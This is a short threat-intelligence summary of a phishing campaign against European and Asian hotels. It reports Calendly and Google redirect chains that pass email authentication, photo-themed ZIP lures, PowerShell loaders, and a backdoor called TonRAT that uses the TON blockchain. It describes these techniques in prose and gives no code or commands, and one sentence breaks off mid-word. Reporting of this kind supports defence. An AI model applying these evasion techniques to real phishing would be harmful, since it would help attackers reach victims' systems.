Essential Insights
- Attackers use sophisticated multi-hop email routes via Calendly and Google redirects to bypass email authentication checks and deliver malicious ZIP files.
- The payload executes PowerShell to decode URLs, download a Node.js environment, and deploy a custom backdoor (TonRAT) that communicates via the TON blockchain, evading static detection.
- Compromised hotel systems are at risk of persistent access through multiple entry points, with potential for prolonged, stealthy data theft, though the exact final payload remains unknown.
Threat Overview, Attack Techniques, and Targets
Microsoft has identified an active phishing campaign targeting hotels and hospitality organizations in Europe and Asia since April 2026. The attackers use photo-themed ZIP files to deliver malware. They do not attribute the activity to a specific threat group. The phishing emails impersonate the “Booking Manager (via Calendly)” and mention guest complaints, health inspections, and reviews. The emails are in Japanese, Danish, and Dutch but do not include personalized details. This suggests the use of mass mailing rather than targeted spear phishing.
The attack delivery relies on a sophisticated routing system. The emails pass email authentication measures like SPF, DKIM, and DMARC because they are sent through permitted infrastructure such as Calendly and Google. After clicking a link, victims are redirected through multiple services, making it hard to trace. The final step involves downloading a ZIP file named “photo-
The malware used in this campaign is TonRAT. It communicates using the TON blockchain API and creates encrypted WebSocket channels. It connects to various IP addresses through non-standard ports. It also performs headless browser automation and geolocation checks. Microsoft has not confirmed data theft or ransomware at this time.
Impact, Security Implications, and Remediation Guidance
The impact of this campaign remains unclear. The malware could enable unauthorized access to hotel systems. The persistent nature of the malware makes cleaning up difficult. Both the persistence paths, such as the RunOnce entry and Node.js files, need to be removed to fully eliminate the threat. The campaign’s goal is not yet fully understood, and no final payload has been identified.
The security implications include ongoing risks of unauthorized access and potential data compromise. The malware’s use of blockchain APIs and encrypted channels complicates detection and blocking. Organizations handling hotel reservations, front-desk operations, and related systems should prioritize monitoring for unusual activity.
Because specific remediation steps are not provided here, organizations should contact their security vendors or relevant authorities for detailed guidance. Ensuring detection capabilities and properly removing malware components is crucial.
Expand Your Tech Knowledge
Dive deeper into the world of Cryptocurrency and its impact on global finance.
Discover archived knowledge and digital history on the Internet Archive.
ThreatIntel-V1
